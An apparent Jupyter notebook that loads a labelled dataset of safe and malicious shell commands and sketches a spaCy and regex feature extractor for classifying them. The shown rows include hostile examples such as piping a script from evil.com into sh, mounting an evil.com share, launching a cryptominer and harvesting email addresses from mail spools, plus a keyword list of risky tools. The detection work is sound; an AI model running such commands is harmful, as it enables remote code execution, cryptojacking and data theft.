In [None]:
import pandas as pd

In [11]:
data=pd.read_csv('Dataset\commands-classification-cleaned.csv')

In [12]:
data.head()


Unnamed: 0,id,command,classification
0,1,find . -name '*.txt'; less file.txt,safe
1,2,man ls; help cd,safe
2,3,cd /tmp; nano example.txt,safe
3,4,cd /tmp; nano example.txt,safe
4,5,cd /tmp; nano example.txt,safe


In [13]:
data.tail()

Unnamed: 0,id,command,classification
357,358,cd /tmp; nohup ./cryptominer -a cryptonight -o...,malicious
358,359,mount -t cifs //evil.com/share /mnt -o user=us...,malicious
359,360,cd /; find . -type f -size -100k 2>/dev/null |...,malicious
360,361,cd /var/mail; grep -r -E -o '\b[A-Za-z0-9._%+-...,malicious
361,362,"curl -s hxxp://evil.com/agent.sh | sh; echo ""*...",malicious


In [19]:
# Import necessary libraries
import pandas as pd
import spacy
import re
from sklearn.model_selection import train_test_split

ModuleNotFoundError: No module named 'spacy'

In [None]:

# 1. LOAD DATASET
# Assuming your data is in a CSV file with columns: ID, Command, Classification
def load_data(data):
    """Load the command dataset from CSV."""
    df = pd.read_csv(file_path)
    print(f"Dataset loaded with {df.shape[0]} rows and {df.shape[1]} columns")
    print("\nColumn names:", df.columns.tolist())
    print("\nSample data:")
    print(df.head())
    
    # Check for missing values
    missing = df.isnull().sum()
    print("\nMissing values per column:")
    print(missing)
    
    # Classification distribution
    print("\nClassification distribution:")
    print(df['Classification'].value_counts())
    
    return df

# 2. PREPROCESS TEXT WITH SPACY
# Load spaCy model
nlp = spacy.load("en_core_web_sm")

def extract_command_features(command_text):
    """Extract features from a command using spaCy processing."""
    # Process the text with spaCy
    doc = nlp(command_text)
    
    # Features dictionary
    features = {
        'tokens': [token.text for token in doc],
        'lemmas': [token.lemma_ for token in doc],
        'entities': [(ent.text, ent.label_) for ent in doc.ents],
        'token_count': len(doc),
        'has_special_chars': bool(re.search(r'[;|&]', command_text)),
    }
    
    return features

# 3. EXTRACT KEY COMMAND FEATURES
def detect_command_patterns(command_text):
    """Detect specific command patterns in the text."""
    # Key commands to detect
    key_commands = ['wget', 'chmod', 'rm', 'sudo', 'su', 'passwd', 'curl', 'nc', 'bash']
    
    # Create a regex pattern to find these commands
    pattern = r'\b(' + '|'.join(key_commands) + r')\b'
    
    # Find all matching commands
    found_commands = re.findall(pattern, command_text)
    
    # Check for specific patterns
    patterns = {
        'has_file_download': bool(re.search(r'\b(wget|curl)\b', command_text)),
        'has_permission_change': bool(re.search(r'\b(chmod)\b', command_text)),
        'has_deletion': bool(re.search(r'\b(rm)\b', command_text)),
        'has_privilege_escalation': bool(re.search(r'\b(sudo|su)\b', command_text)),
        'has_piping': '|' in command_text,
        'has_chaining': ';' in command_text or '&&' in command_text,
        'found_commands': found_commands,
        'command_count': len(found_commands)
    }
    
    return patterns

# Process the entire dataset
def process_dataset(df):
    """Process all commands in the dataset to extract features."""
    # Create new columns for our features
    df['spacy_features'] = df['Command'].apply(extract_command_features)
    df['command_patterns'] = df['Command'].apply(detect_command_patterns)
    
    # Extract some key features as separate columns for easier analysis
    df['token_count'] = df['spacy_features'].apply(lambda x: x['token_count'])
    df['has_special_chars'] = df['spacy_features'].apply(lambda x: x['has_special_chars'])
    df['has_file_download'] = df['command_patterns'].apply(lambda x: x['has_file_download'])
    df['has_permission_change'] = df['command_patterns'].apply(lambda x: x['has_permission_change'])
    df['has_deletion'] = df['command_patterns'].apply(lambda x: x['has_deletion'])
    df['has_privilege_escalation'] = df['command_patterns'].apply(lambda x: x['has_privilege_escalation'])
    df['detected_commands'] = df['command_patterns'].apply(lambda x: x['found_commands'])
    
    return df

# Main workflow
def main():
    # Replace with your actual file path
    file_path = "attacker_commands.csv"
    
    try:
        # 1. Load the dataset
        df = load_data(file_path)
        
        # 2. Process the dataset
        processed_df = process_dataset(df)
        
        # 3. Show sample of processed data
        print("\nSample of processed data:")
        print(processed_df[['ID', 'Command', 'Classification', 'token_count', 
                           'has_special_chars', 'has_file_download', 
                           'has_permission_change', 'detected_commands']].head())
        
        # 4. Split data for ML (if needed)
        X_train, X_test, y_train, y_test = train_test_split(
            processed_df.drop('Classification', axis=1),
            processed_df['Classification'],
            test_size=0.2,
            random_state=42
        )
        print(f"\nData split for ML: {X_train.shape[0]} training examples, {X_test.shape[0]} test examples")
        
        # 5. Save processed data (optional)
        processed_df.to_csv("processed_commands.csv", index=False)
        print("\nProcessed data saved to 'processed_commands.csv'")
        
    except FileNotFoundError:
        print(f"Error: File '{file_path}' not found. Please update the file path.")
    except Exception as e:
        print(f"Error processing data: {e}")

if __name__ == "__main__":
    main()

ModuleNotFoundError: No module named 'spacy'